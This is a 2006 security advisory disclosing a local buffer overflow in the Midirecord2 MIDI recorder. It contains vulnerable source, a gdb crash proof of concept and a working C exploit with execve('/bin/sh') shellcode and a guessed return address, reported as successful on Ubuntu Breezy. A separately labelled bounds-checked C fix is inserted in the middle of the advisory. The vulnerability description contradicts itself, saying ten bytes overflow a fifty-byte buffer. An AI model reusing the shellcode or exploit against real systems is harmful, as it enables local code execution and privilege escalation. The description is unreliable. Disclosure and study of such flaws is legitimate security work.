
Midirecord2 buffer overflow



BufferOverflow in Midirecord2



ECHO_ADV_41$2006

---------------------------------------------------------------------------
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : July, 25th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv41-theday-2006.txt
Exploitation : Local
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Midirecord
Version     : 2
URL         : http://tuma.stc.cx/progs.php
Description :
Midirecord is a simple command-line application to record a MIDI file with your
MIDI keyboard. It also features automatic recording to a MIDI file when you play
electric piano, and thus it may be used as a "recording daemon".

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
The function daemon() is affected by a buffer overflow which could allow
a local attacker to execute malicious code.
The problem is caused by the copying of a string of max 10 bytes into the
filename buffer, which is only 50 bytes.
=0D
------------------midirecord.cc-----------------------------
void daemon(FILE* fin)
{
   char filename[50];                        // fixed-size stack buffer
   printf("Waiting for note-on event.\n");
   while(cont)
   {
        unsigned char status;
        fread(&status, 1, 1, fin); // read status
        if(status>>4 == 0x9)                 // MIDI note-on status nibble
        {
            get_datestr(filename);           // fills filename; no length bound is passed
            printf("Starting to record to %s.\n",filename);
            recordmidi(fin, filename);
            if(cont)
                printf("Finished. Starting to wait for note-on event.\n");
        }
   }

}
----------------------------------------------------------
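As an added example that is not midirecord's own code: a bounds-checked replacement for the unchecked date-string write into daemon()'s filename[50] buffer, plus a generic guard for any string copied into that buffer (get_datestr_safe, set_record_filename and FILENAME_LEN are assumed names).

```c
/* Added example (not midirecord's code); names below are assumed, not the project's. */
#include <stdio.h>
#include <string.h>
#include <time.h>
#define FILENAME_LEN 50          /* same size as filename[50] in midirecord.cc */

/* Build "YYYY-MM-DD_HH-MM-SS.mid" into dst without writing past dstlen. strftime()
 * returns 0 if the string plus its NUL does not fit, so the result is either
 * complete or empty, never a partial or overflowing write. Returns length or -1. */
int get_datestr_safe(char *dst, size_t dstlen, const struct tm *when)
{
    if (dst == NULL || dstlen == 0 || when == NULL)
        return -1;
    size_t n = strftime(dst, dstlen, "%Y-%m-%d_%H-%M-%S.mid", when);
    if (n == 0) {
        dst[0] = '\0';           /* leave a valid empty string, not garbage */
        return -1;
    }
    return (int)n;
}
/* Guard for any string headed into the fixed filename buffer: refuse what does
 * not fit with its terminator rather than truncating (a truncated name would
 * silently change where the recording is written). */
int set_record_filename(char dst[FILENAME_LEN], const char *src)
{
    size_t len = strlen(src);
    if (len >= FILENAME_LEN)
        return -1;               /* would overflow: caller must handle the error */
    memcpy(dst, src, len + 1);   /* len + 1 includes the NUL, bounded by the check */
    return (int)len;
}

int main(void)
{
    char filename[FILENAME_LEN], tiny[8], longname[200];
    struct tm when = {0};        /* constructed sample time: 2006-07-25 13:37:00 */
    when.tm_year = 106; when.tm_mon = 6; when.tm_mday = 25;
    when.tm_hour = 13; when.tm_min = 37;
    if (get_datestr_safe(filename, sizeof filename, &when) < 0)
        return 1;
    printf("Starting to record to %s.\n", filename);
    if (get_datestr_safe(tiny, sizeof tiny, &when) < 0)
        printf("%zu-byte buffer rejected instead of overflowed\n", sizeof tiny);
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    if (set_record_filename(filename, longname) < 0)
        printf("%zu-byte name rejected, filename still %s\n", strlen(longname), filename);
    return 0;
}
```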
=0D
POC:
~~~~
$gdb midirecord
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 10000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 10000'`
Waiting for note-on event.

Program received signal SIGSEGV, Segmentation fault.
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6
(gdb)
=0D
-------Exploit Code-------
/* Successful exploit on Ubuntu Breezy */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1

int main(int argc, char **argv)
{
        char shellcode[] =
                "\x6a\x17\x58\x31\xdb\xcd\x80"
                "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

        if(argc < 2)
        {
                fprintf(stderr, "Use : %s \n", argv[0]);
                return 0;
        }
        char *env[] = {shellcode, NULL};        /* shellcode is handed over in the environment */
        char buf[BUFSIZE];
        int i;
        int *ap = (int *)(buf + ALIGNMENT);
        int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);   /* guessed stack address of env */

        for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;                    /* fill the argument with the return address */
        execle(argv[1], "/dev/midi1", buf, NULL, env);

}
=0D
---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ My Lovely Jessy
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
